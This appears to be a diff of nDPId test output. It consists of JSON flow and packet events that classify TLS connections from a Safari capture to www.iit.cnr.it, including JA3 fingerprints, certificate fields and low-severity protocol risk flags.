-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025217,"flow_last_seen":1620898025217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025217,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620898025217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025217,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtflAbtmxM47AAAAALAC\/\/+cugAAAgQFtAEDAwUBAQgKMzDJ1AAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620898025246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025246,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Mw2y0GI1TJC6AS\/oiwoAAAAgQFrAQCCAo6Vq73MzDJ0wEDAwc="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620898025246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025246,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfjAbsjVMkLMNstB4AQECzNqAAAAQEICjMwyew6Vq73"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620898025246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025246,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+H+SkNFyvoKoqAS\/ojjtwAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620898025246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025246,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfhAbvK+gqi\/kpDRoAQECwAwAAAAQEICjMwyew6Vq72"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+RZmQEsjRUGn6AS\/ogMZAAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfkAbuNFQafWZkBLYAQECwpbAAAAQEICjMwye06Vq75"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+LVp22MQK\/Js6AS\/oitTAAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfiAbtAr8mz1adtjYAQECzKUwAAAQEICjMwye06Vq72"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620898025251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025251,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Xyf4O0ZsTOPKAS\/ohPpwAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620898025251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025251,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtflAbtmxM488n+DtYAQECxsqwAAAQEICjMwyfE6Vq75"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 
-00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898027036,"flow_last_seen":1620898027036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898027036,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1620898027036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898027036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Etf1AbvGGXtuAAAAALAC\/\/+JoQAAAgQFtAEDAwUBAQgKMzDQVQAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5393,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898027065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71\/XZbafoxhl7b6AS\/ogqVAAAAgQFrAQCCAo6VrYRMzDQVQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5394,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898027065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Etf1AbvGGXtv2W2n6YAQECxHWQAAAQEICjMw0HE6VrYR"} 
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01215{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":801,"flow_first_seen":1620898025216,"flow_last_seen":1620898026198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648336,"flow_avg_l4_payload_len":809,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":621,"flow_first_seen":1620898025216,"flow_last_seen":1620898026065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":509563,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":927,"flow_first_seen":1620898025216,"flow_last_seen":1620898026187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":807134,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":800,"flow_first_seen":1620898025217,"flow_last_seen":1620898026128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":676127,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":769,"flow_first_seen":1620898025217,"flow_last_seen":1620898026109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648144,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898024056,"flow_last_seen":1620898024056,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898024056,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620898024056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898024056,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfeAbt7aT+8AAAAALAC\/\/8bGAAAAgQFtAEDAwUBAQgKMzDFWAAAAAAEAgAA"} 